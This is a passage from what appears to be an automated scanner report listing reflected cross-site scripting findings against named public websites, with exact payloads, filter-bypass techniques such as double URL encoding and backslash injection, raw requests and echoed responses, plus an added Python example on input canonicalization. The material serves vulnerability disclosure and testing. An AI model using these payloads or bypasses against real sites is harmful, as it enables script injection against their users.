The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6bd55'%3balert(1)//1eef03b7c29 was submitted in the REST URL parameter 1. This input was echoed as 6bd55';alert(1)//1eef03b7c29 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status6bd55'%3balert(1)//1eef03b7c29 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.magazines.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:48:02 GMT
Server: Apache
Set-Cookie: gs-had=9935bdd04b587bea81f4bf7826018df71e2f65bc; path=/; expires=Sun, 03-Apr-2011 02:48:02 GMT
Set-Cookie: had-source=173.193.214.243; path=/; expires=Tue, 05-Apr-2011 02:48:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=31536000
Pragma: no-cache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT STA"
Set-Cookie: gs-had=9935bdd04b587bea81f4bf7826018df71e2f65bc; path=/; expires=Sun, 03-Apr-2011 02:48:02 GMT
Set-Cookie: had-source=173.193.214.243; path=/; expires=Tue, 05-Apr-2011 02:48:02 GMT
Content-Length: 47657
Expires: Sun, 01 Apr 2012 02:48:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!--


s.prop1 = 'b2c';
   s.channel = 'Homepage';
       s.prop2 = 'Homepage';
   

s.pageType = 'errorPage';
s.pageName = 'http://www.magazines.com/server-status6bd55';alert(1)//1eef03b7c29';


/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/

var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

3.57. http://www.manta.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9afcc"><script>alert(1)</script>ae19b9c022f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /9afcc"><script>alert(1)</script>ae19b9c022f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manta.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Sat, 02 Apr 2011 02:33:20 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 4696
X-Varnish: 3114140320
Via: 1.1 varnish
X-Served-By: ecnext41
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:webmaster@ecnext.com?subject=403 error&body=Access Denied: http://www.manta.com/9afcc"><script>alert(1)</script>ae19b9c022f at Sat Apr 2 02:33:20 2011 +0000 from 173.193.214.243">
...[SNIP]...

3.58. http://www.manta.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manta.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cc594<script>alert(1)</script>f0047a220c5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cc594<script>alert(1)</script>f0047a220c5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manta.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Access Denied
Server: nginx/0.7.62
Date: Sat, 02 Apr 2011 02:33:20 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 4692
X-Varnish: 1293913149
Via: 1.1 varnish
X-Served-By: ecnext43
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<br>
Access Denied: http://www.manta.com/cc594<script>alert(1)</script>f0047a220c5 at Sat Apr 2 02:33:20 2011 +0000 from 173.193.214.243<br>
...[SNIP]...

3.59. http://www.marthastewart.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.marthastewart.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5eaea"-alert(1)-"b68a89bfca4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /5eaea"-alert(1)-"b68a89bfca4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.marthastewart.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.13
Last-Modified: Sat, 02 Apr 2011 02:57:05 +0000
ETag: "1301713025"
Content-Type: text/html; charset=utf-8
X-Ttl: 14400.000
ntCoent-Length: 21362
X-Varnish: 1676929742
X-Req-Grace: 20.000
Cache-Control: private, max-age=0
Expires: Sat, 02 Apr 2011 02:57:05 GMT
Date: Sat, 02 Apr 2011 02:57:05 GMT
Content-Length: 21362
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
mniturePageName="page not found";
s.server="www.marthastewart.com";
s.pageType="";
s.prop1="";
s.prop3="";
s.prop4="channel";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop12="http://www.marthastewart.com/5eaea"-alert(1)-"b68a89bfca4";
s.prop13="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop17="";
s.prop18="";
s.prop19="";
s.prop20="";
s.prop21="";
s.prop22="";
s.prop23="";
s.prop24="";
s.prop25="";
s.prop26="";
s.prop27="logged
...[SNIP]...

3.60. http://www.medications.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.medications.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3e90%255c%2522%253balert%25281%2529%252f%252f829de0d3ff2 was submitted in the REST URL parameter 1. This input was echoed as a3e90\\";alert(1)//829de0d3ff2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /server-statusa3e90%255c%2522%253balert%25281%2529%252f%252f829de0d3ff2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.medications.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:11:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.2
ETag: "c6e317a8e116c5864e82b7298000b5a0"
Cache-Control: max-age=0, private, must-revalidate
X-UA-Compatible: IE=Edge,chrome=1
X-Runtime: 1.543419
Set-Cookie: _medications_session=BAh7CUkiD3Nlc3Npb25faWQGOgZFRiIlOWVjMTBjOWY1MGNiZDQ4NzVlZjkxMmEzOWM0YWY5N2JJIhFoYXNfc2VhcmNoZWQGOwBGVEkiEF9jc3JmX3Rva2VuBjsARkkiMTV4TFpZd2xFM09PdE5iTUs1c3RvSFZNaDRvYkFBQzZiaVpKRHRVc0tibzg9BjsARkkiCmZsYXNoBjsARklDOiVBY3Rpb25EaXNwYXRjaDo6Rmxhc2g6OkZsYXNoSGFzaHsGOhB0cmFja2luZ19qc1sISSIbZ2FTZXRTZWFyY2hlZCggX2dhcSApOwY7AEZJIk1nYVNldFNlYXJjaGVkRm9yKCBfZ2FxLCAic2VydmVyLXN0YXR1c2EzZTkwXFwiO2FsZXJ0KDEpLy84MjlkZTBkM2ZmMiIgKTsGOwBGSSI4Z2FWaXJ0dWFsUGFnZVZpZXcoIF9nYXEsICIvaWdub3JlL2dhL3Zwdi9zZWFyY2giICk7BjsARgY6CkB1c2VkbzoIU2V0BjoKQGhhc2h7BjsHVA%3D%3D--a7c6172ac760634eb27d69ffd030f8f32e49072c; path=/; HttpOnly
Status: 200
Content-Type: text/html; charset=utf-8
Content-Length: 24591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <meta http-equiv="Con
...[SNIP]...
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-21047672-1']);
gaSetSearched( _gaq );gaSetSearchedFor( _gaq, "server-statusa3e90\\";alert(1)//829de0d3ff2" );gaVirtualPageView( _gaq, "/ignore/ga/vpv/search" );
_gaq.push(['_trackPageview']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascri
...[SNIP]...
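The filter bypass described in 3.60 is a question of ordering: the blocklist ran after one URL decode, and something later decoded the value again. This Python is an added example, not the medications.com code; the site's pipeline is not visible in the report, so the modelled ordering (one decode, then a blocklist, then a second decode at the sink) and the blocklist contents are assumptions. sink_value() shows the report's payload reaching the page intact, and canonicalize() shows the check that would have caught it.

```python
"""Why the double URL-encoded payload in 3.60 got past the character filter.

Added example; not the medications.com code. The site's real pipeline is not
visible in the report, so the ordering modelled here (one decode, then the
blocklist, then a second decode at the sink) is an assumption, as is the
character blocklist.
"""
from urllib.parse import unquote

PAYLOAD = "a3e90%255c%2522%253balert%25281%2529%252f%252f829de0d3ff2"  # from the report
BLOCKED = set('<>"\'\\;')  # assumed blocklist: the usual XSS metacharacters


def filter_rejects(value: str) -> bool:
    """The blocklist check. It only sees whatever decoding has happened before it runs."""
    return any(c in BLOCKED for c in value)


def sink_value(raw: str, decodes_before_filter: int, decodes_after_filter: int):
    """Run `raw` through the modelled pipeline and return what reaches the page,
    or None if the filter rejected it."""
    value = raw
    for _ in range(decodes_before_filter):
        value = unquote(value)
    if filter_rejects(value):
        return None
    for _ in range(decodes_after_filter):
        value = unquote(value)
    return value


def canonicalize(raw: str, max_rounds: int = 5) -> str:
    """Decode until the value stops changing, so the filter inspects the same
    characters the sink will use. Bails out on absurd nesting rather than looping."""
    value = raw
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many layers of URL encoding")


def hardened_sink_value(raw: str):
    """Filter on the canonical form; the sink must not decode again afterwards."""
    value = canonicalize(raw)
    return None if filter_rejects(value) else value


if __name__ == "__main__":
    print("one decode, filter, one decode:", sink_value(PAYLOAD, 1, 1))
    print("two decodes, then filter:      ", sink_value(PAYLOAD, 2, 0))
    print("canonical form:                ", canonicalize(PAYLOAD))
    print("hardened pipeline:             ", hardened_sink_value(PAYLOAD))
```

Canonicalising before the filter removes this particular mismatch, but a blocklist is still not the fix: the value in 3.60 ends up inside a JavaScript string and needs JavaScript-string encoding at that sink, whatever the filter in front of it does.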

3.61. http://www.nationalguard.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nationalguard.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 69540<img%20src%3da%20onerror%3dalert(1)>1d959bd914b was submitted in the REST URL parameter 1. This input was echoed as 69540<img src=a onerror=alert(1)>1d959bd914b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /server-status69540<img%20src%3da%20onerror%3dalert(1)>1d959bd914b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nationalguard.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:06:25 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.5-0.dotdeb.0 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Set-Cookie: guardSID=0d27c45f5897afdd64bce46a2479f56b; path=/; domain=.nationalguard.com
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 81283


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta
...[SNIP]...
<h1 class="rr_h1">Sorry, no results for: server-status69540<img src=a onerror=alert(1)>1d959bd914b </h1>
...[SNIP]...

3.62. http://www.nyu.edu/server-info [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nyu.edu
Path:   /server-info

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 38095<script>alert(1)</script>2b770d2c546 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-info?38095<script>alert(1)</script>2b770d2c546=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nyu.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Date: Sat, 02 Apr 2011 01:54:00 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7d
Content-Type: text/html
Content-Length: 9785

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>New York University &gt; 403 F
...[SNIP]...
<p>http://nyu.edu/server-info?38095<script>alert(1)</script>2b770d2c546=1</p>
...[SNIP]...

3.63. http://www.nyu.edu/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nyu.edu
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 500f4<script>alert(1)</script>ddaff05e65a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?500f4<script>alert(1)</script>ddaff05e65a=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nyu.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Date: Sat, 02 Apr 2011 02:26:56 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7d
Content-Type: text/html
Content-Length: 9787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>New York University &gt; 403 F
...[SNIP]...
<p>http://nyu.edu/server-status?500f4<script>alert(1)</script>ddaff05e65a=1</p>
...[SNIP]...

3.64. http://www.offers.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.offers.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e356a"><script>alert(1)</script>7ad6e41a8ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /server-statuse356a"><script>alert(1)</script>7ad6e41a8ab HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.offers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:05:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Set-Cookie: psid=73040e76cecd228c351039c0cfb0f036bd4f7461; path=/; domain=offers.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ouid=1364941793908559727%26855236cdeccbfbb50b8e81e43b4f876c27556d982f52da2a7e23983efce74cc3; expires=Fri, 01-Mar-2013 05:00:00 GMT; path=/; domain=offers.com
Set-Cookie: ostt=1364941793911705456%2608bc587c01bfd5fdd61904a8438ee899b8f444a49b0188301a5bf2f8ec00691b; expires=Sat, 02-Apr-2011 02:35:32 GMT; path=/; domain=www.offers.com
Set-Cookie: osbt=1364941793911705456%2608bc587c01bfd5fdd61904a8438ee899b8f444a49b0188301a5bf2f8ec00691b; path=/; domain=www.offers.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 34664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...
<link rel="canonical" href="http://offers.com/server-statuse356a"><script>alert(1)</script>7ad6e41a8ab/" />
...[SNIP]...

3.65. http://www.patch.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.patch.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3ab7\"%3balert(1)//1f61db5babd was submitted in the REST URL parameter 1. This input was echoed as a3ab7\\";alert(1)//1f61db5babd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /server-statusa3ab7\"%3balert(1)//1f61db5babd HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.patch.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:41:19 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8l Phusion_Passenger/3.0.2
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.2
X-Rack-Cache: miss
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _patch_session=BAh7BzoPc2Vzc2lvbl9pZCIlM2E5ZmNiYzBlMzI2NTFlNzkyYjE4NTdmZTdmYmIzY2Q6EF9jc3JmX3Rva2VuIjFhU0dhcGl3L2gwSXBSN0JXc3JzclVMRTlwaEp2U1RTUmpNNzI1YitWZkFnPQ%3D%3D--b6eff7a60074f048b83f2f4aba546015203dbb18; domain=patch.com; path=/
Content-Length: 24900
Status: 404
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html xmlns:fb='http://www.facebook.com/2008/fbml' xmlns:og='http://opengraphprotocol.org/schema/' xmlns='http://www.w3.org/1999/xhtml'>
<head>
<script type="text/javascript">
//<![CDA
...[SNIP]...
nalFilters="javascript:,patch.com,sjobs.brassring.com";
s_265.server="patchfe-d29.ihost.aol.com"
s_265.pageName="";
s_265.prop1="www";
s_265.prop16="1";
s_265.prop12="http://www.patch.com/server-statusa3ab7\\";alert(1)//1f61db5babd";
s_265.prop2="Misc";
s_265.events="";
s_265.products="";
s_265.eVar2="Guest";
s_265.eVar1="102";
s_265.mmxgo=true;
var s_code=s_265.t();
}
s_account="aolsvc,aolpatch";
omni_bN_host="www.patch.com";
i
...[SNIP]...

3.66. http://www.pcpitstop.com/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcpitstop.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 892d6"><script>alert(1)</script>bd699dc7d53 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?892d6"><script>alert(1)</script>bd699dc7d53=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pcpitstop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not found
Date: Sat, 02 Apr 2011 02:11:47 GMT
Server: Microsoft-IIS/6.0
ETag:
Content-Length: 9015
Content-Type: text/html
Cache-control: private


<html>
<head>
<title>PC Pitstop: Not Found</title>
<!--Begin header-->
<!--[if lt IE 7]>
<script defer type="text/javascript" src="/inc/pngfix.js"></script>
<![endif]-->

<meta http-equiv=
...[SNIP]...
<a href="/error404.asp?404;http://www.pcpitstop.com:80/server-status?892d6"><script>alert(1)</script>bd699dc7d53=1&print=1">
...[SNIP]...

3.67. http://www.picosearch.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.picosearch.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8c367<script>alert(1)</script>b5abe79dc4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status8c367<script>alert(1)</script>b5abe79dc4c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.picosearch.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:15:43 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_perl/2.0.3 Perl/v5.8.8
Connection: close
Content-Type: text/html
Content-Length: 1352

<html>
<head>
<title>PicoSearch Error</title>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
</head>
<body text=#333333 bgcolor=#ffffff>
<!--4d8cezq-->
<table border=0 cellpadding=
...[SNIP]...
<p>
The requested URL /server-status8c367<script>alert(1)</script>b5abe79dc4c was not found on this server.
</p>
...[SNIP]...

3.68. http://www.prescriptiondrug-info.com/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prescriptiondrug-info.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab681"><script>alert(1)</script>21eeba426d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?ab681"><script>alert(1)</script>21eeba426d2=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.prescriptiondrug-info.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:46:09 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Content-Length: 33024
Content-Type: text/html
Expires: Sat, 02 Apr 2011 02:45:09 GMT
Cache-control: no-cache

<!DOCTYPE html>
<html lang="en">
<head>
   <title>404 Error - The People's Medicine Community</title>
   <meta charset="utf-8"/>
   <meta name="Description" content="Learn about and discuss drugs freel
...[SNIP]...
<link rel="canonical" href="http://www.prescriptiondrug-info.com/404.asp?404;http://www.prescriptiondrug-info.com:80/server-status?ab681"><script>alert(1)</script>21eeba426d2=1"/>
...[SNIP]...

3.69. http://www.pronto.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pronto.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1a846'><script>alert(1)</script>a279237148 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status1a846'><script>alert(1)</script>a279237148 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pronto.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:39:04 GMT
Server: Apache/2.2.4 (Fedora)
Content-Type: text/html;charset=ISO-8859-1
Via: CN-5000
Proxy-Connection: Keep-Alive
Content-Length: 90401


            <!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"

...[SNIP]...
<meta content='http://www.pronto.com/server-status1a846'><script>alert(1)</script>a279237148' property='og:url'/>
...[SNIP]...

3.70. http://www.rzaz.net/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rzaz.net
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14d70"><script>alert(1)</script>61f0fa7877c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status14d70"><script>alert(1)</script>61f0fa7877c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rzaz.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:00:25 GMT
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 774

<html>
<head>
<title>www.rzaz.net</title>
<meta name="keywords" content="">
</head>
<frameset ROWS="100%,*" BORDER="0" FRAMEBORDER="0" FRAMESPACING="0">
<frame NAME="top" SRC="http://searchportal.inf
...[SNIP]...
<a HREF="http://searchportal.information.com/?o_id=111662&domainname=www.rzaz.net./server-status14d70"><script>alert(1)</script>61f0fa7877c">
...[SNIP]...

3.71. http://www.rzaz.net/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rzaz.net
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ea90"><script>alert(1)</script>789736ff2ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /6ea90"><script>alert(1)</script>789736ff2ae HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rzaz.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:00:25 GMT
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 735

<html>
<head>
<title>www.rzaz.net</title>
<meta name="keywords" content="">
</head>
<frameset ROWS="100%,*" BORDER="0" FRAMEBORDER="0" FRAMESPACING="0">
